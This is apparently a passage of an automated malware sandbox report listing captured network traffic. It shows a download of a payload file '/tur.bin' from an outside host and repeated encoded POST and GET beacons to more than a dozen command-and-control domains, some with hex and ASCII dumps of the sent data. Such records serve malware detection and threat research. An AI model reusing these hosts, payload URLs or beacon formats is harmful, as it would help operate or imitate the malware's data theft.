55 58 63 59 6e 6d 6a 73 6b 64 51 37 57 56 78 4f 6a 69 31 55 67 3d 3d Data Ascii: oz=ZqAKhjHDqXd5rQXLnXFEuYJA4ecwdN+aGP0Z1NsdFstLRedRcBDb8CrbAkjunBzyH6Gl/pbnFSkJQWYCbdvtvI0Y3ISQdRvHkyb4xIIyyNsy1RkFoFXGSb1oc3fpnfyhKuXo7lAL2DqfIU1WmF1tD6XZJe8kQDVx1IwBPfAaWiHoUUXcYnmjskdQ7WVxOji1Ug==
        Source: global trafficHTTP traffic detected: POST /phvf/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.greekhause.orgOrigin: http://www.greekhause.orgReferer: http://www.greekhause.org/phvf/Content-Length: 219Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 5a 71 41 4b 68 6a 48 44 71 58 64 35 35 6a 2f 4c 68 77 52 45 2f 34 4a 50 30 2b 63 77 57 74 2b 65 47 50 34 5a 31 4a 39 51 46 35 46 4c 51 2b 74 52 64 44 37 62 37 43 72 62 4c 45 6a 72 6a 42 7a 70 48 36 4c 59 2f 6f 33 6e 46 53 41 4a 51 58 49 43 61 75 58 75 39 6f 30 61 39 59 53 4f 5a 52 76 48 6b 79 62 34 78 49 4e 5a 79 4e 6b 79 31 67 55 46 70 67 36 51 65 37 31 72 62 33 66 70 30 50 79 6c 4b 75 57 2f 37 6b 4d 68 32 41 43 66 49 52 4a 57 33 30 31 75 61 4b 58 66 4e 65 39 73 63 68 4d 5a 79 34 63 76 45 50 45 78 54 42 4b 54 52 43 47 47 46 56 53 48 76 33 42 69 2f 6d 73 5a 4d 68 6a 75 4a 6f 45 4a 2b 36 6e 52 75 74 76 7a 64 4a 79 51 71 55 2f 46 55 31 30 3d Data Ascii: oz=ZqAKhjHDqXd55j/LhwRE/4JP0+cwWt+eGP4Z1J9QF5FLQ+tRdD7b7CrbLEjrjBzpH6LY/o3nFSAJQXICauXu9o0a9YSOZRvHkyb4xINZyNky1gUFpg6Qe71rb3fp0PylKuW/7kMh2ACfIRJW301uaKXfNe9schMZy4cvEPExTBKTRCGGFVSHv3Bi/msZMhjuJoEJ+6nRutvzdJyQqU/FU10=
        Source: global trafficHTTP traffic detected: POST /phvf/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.greekhause.orgOrigin: http://www.greekhause.orgReferer: http://www.greekhause.org/phvf/Content-Length: 7367Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 5a 71 41 4b 68 6a 48 44 71 58 64 35 35 6a 2f 4c 68 77 52 45 2f 34 4a 50 30 2b 63 77 57 74 2b 65 47 50 34 5a 31 4a 39 51 46 35 64 4c 51 50 4e 52 63 6b 58 62 36 43 72 62 49 45 6a 71 6a 42 79 70 48 36 53 66 2f 70 4b 63 46 55 45 4a 52 31 51 43 64 66 58 75 6b 59 30 61 7a 49 53 50 64 52 76 6f 6b 7a 32 7a 78 4a 39 5a 79 4e 6b 79 31 69 4d 46 75 31 57 51 63 37 31 6f 63 33 66 74 6e 66 79 4e 4b 75 50 4b 37 6b 49 62 33 77 69 66 49 77 35 57 6b 69 4a 75 54 4b 58 64 49 65 38 71 63 68 77 47 79 34 41 64 45 50 77 58 54 43 71 54 63 33 37 6b 5a 46 4f 49 74 55 46 76 79 32 59 34 4d 7a 44 65 50 76 56 30 32 70 54 4c 6b 36 2f 43 59 36 2b 4d 37 42 53 44 46 43 70 61 4c 79 33 7a 4f 79 55 73 47 4f 4e 42 68 4c 62 6d 4c 33 31 4b 31 51 42 38 4f 72 6e 4c 53 42 2b 48 42 38 52 6e 46 46 61 61 73 54 72 66 50 38 66 32 4d 4c 4d 57 7a 45 79 4f 79 66 76 63 66 5a 2f 46 6a 59 4e 4e 67 66 72 6e 74 4f 5a 43 72 69 62 4d 42 62 71 31 50 4d 34 37 42 34 47 6d 65 51 70 30 5a 47 4c 33 6f 79 35 79 61 58 4e 31 6b 58 70 6b 45 41 31 4f 4f 6c 6d 69 74 56 77 57 48 76 6d 61 4a 41 56 52 5a 76 6e 53 4e 4f 78 42 48 44 48 73 78 6e 6c 45 4f 32 35 37 76 52 47 75 62 4d 37 47 6a 52 5a 34 32 48 77 57 6e 32 70 74 36 34 7a 6c 78 36 34 50 35 76 37 66 6c 44 41 6b 30 39 59 4f 57 73 58 4a 77 50 36 73 64 6d 73 79 33 31 45 33 62 6d 37 65 31 52 2f 6e 37 47 52 48 72 50 51 72 2f 2f 78 4a 66 37 64 31 7a 54 6d 44 78 6d 35 68 2f 73 50 79 58 71 35 4b 30 4f 6d 6e 73 34 37 45 69 78 55 6e 4a 4b 58 33 4a 41 65 6d 71 55 66 49 53 57 4f 47 68 58 67 4a 35 54 74 41 71 76 38 6a 62 52 79 55 4b 7a 48 52 68 55 64 4e 38 48 52 5a 54 32 56 63 31 75 35 6b 69 2f 2f 6d 74 69 73 4d 54 76 37 66 55 55 35 6f 75 77 55 4f 6e 69 49 79 39 70 78 73 6b 73 56 32 72 51 51 32 55 76 73 5a 44 58 45 72 61 75 74 49 45 4d 42 50 57 74 43 4f 30 55 41 7a 51 4a 35 64 2f 59 6d 73 71 4b 42 62 6f 37 54 2b 68 6f 55 35 4a 2b 35 44 48 65 49 70 45 69 56 50 4c 50 46 5a 76 44 4c 33 77 37 5a 61 7a 72 2b 77 70 66 54 66 54 49 58 41 6f 63 39 63 2b 38 73 79 79 66 4c 6b 49 58 74 36 41 55 37 79 49 77 6d 64 70 74 32 68 79 65 79 65 6a 56 41 33 56 43 6b 7a 42 38 5a 50 4b 35 52 63 53 52 45 45 4f 76 58 2b 61 48 47 4c 76 30 58 65 71 6b 38 4e 33 72 42 41 31 49 59 57 79 38 62 72 71 34 59 61 76 73 6d 6f 63 37 41 2b 34 62 56 46 75 78 46 31 58 4b 46 4e 33 4d 4a 4c 78 7a 76 57 45 6d 64 44 58 53 34 35 73 4d 71 67 54 2f 73 41 51 59 6d 34 78 2f 54 35 74 73 4d 48 6a 32 39 45 41 4
        Source: global trafficHTTP traffic detected: GET /phvf/?oz=UooqiU+uiXRphlexxihY8+pR2p1qSaCGRsMigt4MGpA/VKVyXkL8qyeifVWI1Qf9IbKjjaT+NB40EHI1csOw8bEH8rv5XgPpsHil2J4w5MJOwgpAt1bCRv0=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.greekhause.orgConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: POST /d84b/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.dorikis.onlineOrigin: http://www.dorikis.onlineReferer: http://www.dorikis.online/d84b/Content-Length: 199Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 47 42 6b 33 4d 44 47 51 5a 51 48 43 36 68 50 34 43 49 6d 57 44 75 6e 79 47 71 30 4d 74 4c 6a 35 72 34 39 4e 49 45 76 78 59 36 2b 70 70 44 4a 37 45 78 32 30 43 39 55 55 62 71 46 76 4f 76 73 42 52 54 45 51 44 64 53 45 5a 46 61 42 41 4d 78 71 2b 59 4b 4d 42 43 53 68 67 50 6f 46 6a 41 46 59 47 69 50 76 59 6b 4d 54 30 46 7a 70 79 45 58 74 39 6c 31 76 48 56 34 79 63 59 73 72 50 47 4f 4e 71 68 74 77 43 37 46 50 31 41 79 76 36 48 65 53 68 71 35 37 41 61 39 30 7a 4f 44 67 76 38 43 35 70 51 67 51 68 65 32 63 38 4e 32 2f 6a 6f 46 6d 43 64 68 42 30 51 64 71 65 6a 38 57 77 48 54 72 5a 77 3d 3d Data Ascii: oz=GBk3MDGQZQHC6hP4CImWDunyGq0MtLj5r49NIEvxY6+ppDJ7Ex20C9UUbqFvOvsBRTEQDdSEZFaBAMxq+YKMBCShgPoFjAFYGiPvYkMT0FzpyEXt9l1vHV4ycYsrPGONqhtwC7FP1Ayv6HeShq57Aa90zODgv8C5pQgQhe2c8N2/joFmCdhB0Qdqej8WwHTrZw==
        Source: global trafficHTTP traffic detected: POST /d84b/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.dorikis.onlineOrigin: http://www.dorikis.onlineReferer: http://www.dorikis.online/d84b/Content-Length: 219Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 47 42 6b 33 4d 44 47 51 5a 51 48 43 34 42 66 34 42 72 65 57 53 2b 6e 31 4a 4b 30 4d 36 62 6a 39 72 34 78 4e 49 47 44 62 59 50 4f 70 6e 43 35 37 46 7a 53 30 48 39 55 55 50 61 46 6d 52 66 73 61 52 54 35 74 44 66 57 45 5a 46 4f 42 41 49 31 71 2b 70 4b 4e 54 69 54 48 31 66 6f 44 74 67 46 59 47 69 50 76 59 6e 77 35 30 46 4c 70 7a 31 6e 74 73 77 56 6f 4c 31 34 31 62 59 73 72 4c 47 4f 42 71 68 73 56 43 35 78 70 31 43 61 76 36 46 47 53 68 62 35 38 4f 61 38 39 2f 65 44 77 69 63 62 56 6f 54 6f 74 77 4f 33 50 36 2b 71 57 6d 2b 55 38 66 76 56 6c 33 44 42 59 61 54 46 2b 79 46 53 77 45 37 2b 58 4f 43 78 65 2b 44 68 66 53 63 4e 38 73 64 59 53 41 72 49 3d Data Ascii: oz=GBk3MDGQZQHC4Bf4BreWS+n1JK0M6bj9r4xNIGDbYPOpnC57FzS0H9UUPaFmRfsaRT5tDfWEZFOBAI1q+pKNTiTH1foDtgFYGiPvYnw50FLpz1ntswVoL141bYsrLGOBqhsVC5xp1Cav6FGShb58Oa89/eDwicbVoTotwO3P6+qWm+U8fvVl3DBYaTF+yFSwE7+XOCxe+DhfScN8sdYSArI=
        Source: global trafficHTTP traffic detected: POST /d84b/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.dorikis.onlineOrigin: http://www.dorikis.onlineReferer: http://www.dorikis.online/d84b/Content-Length: 7367Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 47 42 6b 33 4d 44 47 51 5a 51 48 43 34 42 66 34 42 72 65 57 53 2b 6e 31 4a 4b 30 4d 36 62 6a 39 72 34 78 4e 49 47 44 62 59 50 47 70 6e 30 74 37 46 54 75 30 41 39 55 55 4d 61 46 72 52 66 73 62 52 54 68 70 44 66 4c 78 5a 47 32 42 61 74 68 71 34 62 75 4e 5a 69 54 48 33 66 6f 47 6a 41 46 33 47 6b 76 72 59 6b 59 35 30 46 4c 70 7a 32 2f 74 38 56 31 6f 4e 31 34 79 63 59 73 76 50 47 4f 6c 71 68 31 6f 43 36 64 66 31 79 36 76 35 6c 57 53 79 4e 74 38 43 61 38 2f 2b 75 43 76 69 63 6e 4b 6f 54 45 62 77 4f 43 53 36 39 4b 57 6e 76 39 2f 4b 74 68 4f 75 54 5a 52 46 41 35 63 6b 45 71 53 4c 4a 4b 4b 4b 78 6f 72 32 56 6c 64 54 75 5a 4c 34 38 55 61 44 50 4c 52 76 71 4f 50 51 5a 39 4f 73 54 73 2b 64 72 32 4f 6f 45 57 70 6f 4f 39 55 34 70 4c 43 74 74 47 58 6b 32 4a 37 77 75 44 33 66 4a 67 77 66 6a 43 48 6a 37 71 4a 48 31 42 79 6b 69 6d 77 34 37 63 4d 65 49 72 76 71 76 4a 4f 6b 48 4f 52 5a 45 72 35 31 30 6d 42 38 30 37 6e 77 56 4d 57 71 76 33 49 4c 63 46 6b 53 7a 65 4e 4e 79 53 6f 39 53 74 39 33 30 75 4a 45 5a 6b 50 35 4d 78 55 59 6d 44 47 74 56 42 52 4b 71 35 70 53 32 33 4c 64 55 79 76 69 6f 43 6d 74 46 6b 2f 4e 77 6b 44 6b 6d 37 31 71 7a 4f 6a 56 31 62 58 30 58 30 32 68 41 30 46 42 43 48 47 6e 6d 64 43 70 37 43 67 37 64 4d 64 68 4f 4b 62 50 6b 67 4a 56 58 6a 73 6d 68 44 35 65 68 68 34 33 4f 6a 76 6c 37 66 4c 6e 56 73 76 78 55 74 6c 7a 65 5a 36 44 50 47 5a 73 59 78 73 59 79 51 42 56 59 77 7a 51 63 79 4d 57 4a 71 73 31 6b 50 72 66 59 77 52 6c 64 39 39 43 77 76 6f 42 6b 44 65 49 7a 62 2b 77 55 49 44 30 39 6a 30 52 50 72 35 47 67 68 55 6f 7a 44 46 2f 78 4f 54 7a 6d 34 58 51 67 58 50 55 4c 65 41 71 53 69 56 42 71 45 48 68 49 62 43 37 42 75 39 39 46 55 46 69 4c 76 77 62 36 4a 36 57 4e 71 4e 35 6d 64 2f 58 5a 52 4c 73 58 50 6e 64 46 4d 32 76 63 54 6c 58 30 64 38 51 74 38 73 53 34 68 75 61 43 52 4b 51 4c 61 79 76 35 43 65 4c 2b 4a 44 46 64 75 61 43 31 78 6d 78 6c 43 43 53 43 45 6b 7a 78 69 4a 6b 63 6c 2f 71 77 34 56 32 45 56 76 7a 64 58 44 34 37 46 78 46 4b 4a 37 63 76 62 6a 42 37 63 39 46 7a 6a 54 42 4a 44 46 76 54 38 70 46 57 48 77 61 30 4b 38 38 49 71 32 4a 2b 57 33 67 71 41 4c 46 2f 6b 51 39 46 6f 64 42 54 67 72 33 47 71 76 68 4c 72 41 61 52 6c 66 4d 44 71 44 33 74 2b 64 76 67 31 74 2f 73 39 61 75 50 57 62 35 72 76 45 65 67 71 43 6e 71 36 74 72 30 64 5a 70 32 49 4f 37 6d 69 77 57 59 32 33 4a 54 64 6c 51 54 49 4c 2b 37 51 46 58 5a 4e 70 76 32 70 34 56 6
        Source: global trafficHTTP traffic detected: GET /d84b/?oz=LDMXP2ida3jj6Wv8YbWYWcXQGJdr9fjlzYlCdzHaAPX6jElzFVuifqg0YZMPIM8JGTBjffDneHOFDPAe46iMAyLvyO9+lRB2GxTtOnRawDOQ6U7+wx9GICg=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.dorikis.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /tur.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: fredy.eeConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /tur.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: fredy.eeCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /tcs6/?oz=UTr2VQMVaNknAPhv8pO5HUt/aSD/OuAvYfufonxWcuzqKYzjt00ESHNOp8OZd4NYpPhYAhKEfFByAl9/w+FcumGXOFp58MMDhVPqk9564kxN8Oc8kW08N+s=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.invicta.worldConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /bqye/?UJ9=qN-llTKPHxntPrv0&oz=orBWFM4TMH6bEQWb0mufnyz8+/9zteVW//lS5P1UVpZ6i4UA1urKkBRolapSd+D0qVvV/pdb4OKcqrb8qmiU7f8Sw/VtSC1B9WeqmjWWYlIhrofH/7u6E+o= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.whats-in-the-box.orgConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /was5/?oz=y8MnD3CAUjfvlbCaxAVac63GvK68hywkVQck0F03MMraCQdP6i6ahgEcKS99S8jCMAfRd1EgvYBIkI1gFr2JNRymkxf7KUrPibiqIzK4PCKgQN9qHiwVnD0=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.linkwave.cloudConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /7k8f/?oz=1xd2XIdTc2qaFZ+FWSTYli7OxzQOBufybu6t7KDIboRfwcHmUmPthK5WfpWTXJmR/FSLDU2eJw9bxVvh/BR2RAGhDgY7k/sU7CIWPHYqUL7qqxcngXtaZyk=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.dfmagazine.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /txr6/?oz=nTAbXiRbAR9Tmn1EygfckhJ8auTVp3cQBZgFAHmQGrw0Kpxo+btzHXTBwKiLhdY3AsfxfRA0GE/MmBFG+RiimQs6glJH3Tq6ibBpV287KGVZpLZHDS41jcE=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.ngmr.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /7cy1/?oz=NuunJUERQovrcOQM4pbN0sXyOdFy/3jSqqQUAe4+iYgeK7ulJS9OoncvbeOag3vILBHdN8yfojyADwDpW/rc4czucw94LLL42y8tkGUt2pDt0O2/v+PPRf0=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.albero-dveri.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /qjs8/?oz=ejIma/W1pGRFx7ChnTgroDHkNn1VdqZgcszQV8LCwj4556o206I/YZ5OId3qzm2jECDslwuStodYNwU7Ng5KBO4as1dQdJVJJimzghFMohwqM9lhe6W/0oM=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.typ67.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /phvf/?oz=UooqiU+uiXRphlexxihY8+pR2p1qSaCGRsMigt4MGpA/VKVyXkL8qyeifVWI1Qf9IbKjjaT+NB40EHI1csOw8bEH8rv5XgPpsHil2J4w5MJOwgpAt1bCRv0=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.greekhause.orgConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /d84b/?oz=LDMXP2ida3jj6Wv8YbWYWcXQGJdr9fjlzYlCdzHaAPX6jElzFVuifqg0YZMPIM8JGTBjffDneHOFDPAe46iMAyLvyO9+lRB2GxTtOnRawDOQ6U7+wx9GICg=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.dorikis.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /qo4k/?oz=36KtwjIDafomy9tqOdqNwmsTn0KS8yDqwBoT0TnhmWNBmrcWA57j581r3y6lS3Ypxl7bXHdk4WhS3KsNzHZbX1L1UxoK9zL5luuQrcJM9iAor4hALAJtoKM=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.platinumkitchens.infoConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /yyvd/?oz=NqcJB3pZzzicH1g7OCf+o29R25c64Oc8uERdjrOnv2081dkqh5dbyixi1IWdR8hocD/pCHEuLxSxGQJUj5oKb5xJ79EhBhZUZc8Ysxx7YEgkHTlCWWMUk7k=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.dhkatp.vipConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /iydt/?oz=Devrpt6CKIMDtnVDPR2S8x3yMYRId44n2aQLSTimhEZ/Y4z+iB4Tcv9O6cZB31p1Mi5MvPz0n4i/4vc8VuesM/xDDO+6C7ZbX/5xARUztqgUqGu06GFp6xk=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.tempatmudisini01.clickConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /qwk1/?oz=zuS7aiF7UCmUZEGCFTElZNoc1TsXMIUH7bJjsGqWHOHqpoebjKjp7AEKoIo96ikD3t7upPrvfpp3YpWkIK1WRnsiE3z7WHp76C45XcEHI5LxV+/vcHJ1HMs=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.komart.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /ytua/?oz=eEoKyIBkgP1r3UaSX5x2BcdCaSeQE0m7SIzn6MAF2Eoa7eZjgA7VjWJ9hDDUm15GkCbg2BHkZRaH6Ojl2CuAMP081j8WR4/cwGyXJgzH3SFq+T0y0nykltc=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.dxeg.lolConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /dlt0/?oz=9mltyUpqTpNFGgiLLM/QIt0JA1EyaLVwbNO6LVK8xMKAahqO0kx85NrrrztI4+WdJ+WmFSXeCNM39PHdIGjD1nD8ckOcgacQtsimUjnJeyDglSYeX59cdP4=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.tukaari.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
